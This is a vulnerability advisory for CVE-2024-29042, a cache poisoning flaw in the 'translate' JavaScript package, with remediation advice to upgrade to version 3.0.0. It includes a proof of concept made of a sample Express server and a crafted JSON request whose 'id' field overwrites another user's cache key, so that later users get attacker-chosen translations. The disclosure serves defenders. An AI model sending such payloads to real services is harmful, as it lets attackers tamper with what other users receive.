CVE-2024-29042

Description

### Summary An attacker controlling the second variable of the `translate` function is able to perform a cache poisoning attack. They can change the outcome of translation requests made by subsequent users. ### Details The `opt.id` parameter allows the overwriting of the cache key. If an attacker sets the `id` variable to the cache key that would be generated by another user, they can choose the response that user gets served. ### PoC Take the following simple server allowing users to supply text and the language to translate to. ```javascript import translate from "translate"; import express from 'express'; const app = express(); app.use(express.json()); app.post('/translate', async (req, res) => { const { text, language } = req.body; const result = await translate(text, language); return res.json(result); }); const port = 3000; app.listen(port, () => { console.log(`Server is running on port ${port}`); }); ``` We can send the following request to poison the cache: ``` {"text":"I hate you", "language":{"to":"nl","id":"undefined:en:nl:google:I love you"}} ``` ![Poisoning the cache](https://user-images.githubusercontent.com/44903767/285421743-ccfa3d9d-24cf-47b7-b805-0e4034cec82e.png) Now, any user that attempts to translate "I love you" to Dutch, will get "I hate you" in Dutch as the response. ![The victim gets our poisoned data](https://user-images.githubusercontent.com/44903767/285422033-b3853ca2-8a5a-4875-91e8-ba2ef0258bc6.png) ### Impact An attacker can control the results other users may get

How to fix CVE-2024-29042

To remediate CVE-2024-29042, upgrade the affected package to a fixed version below.

—upgrade to 3.0.0 or later

Is CVE-2024-29042 being exploited?

Low — EPSS is 1.0%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

from 0, < 3.0.0

Description

How to fix CVE-2024-29042

Is CVE-2024-29042 being exploited?

Affected packages (1)

CVSS scores

References (5)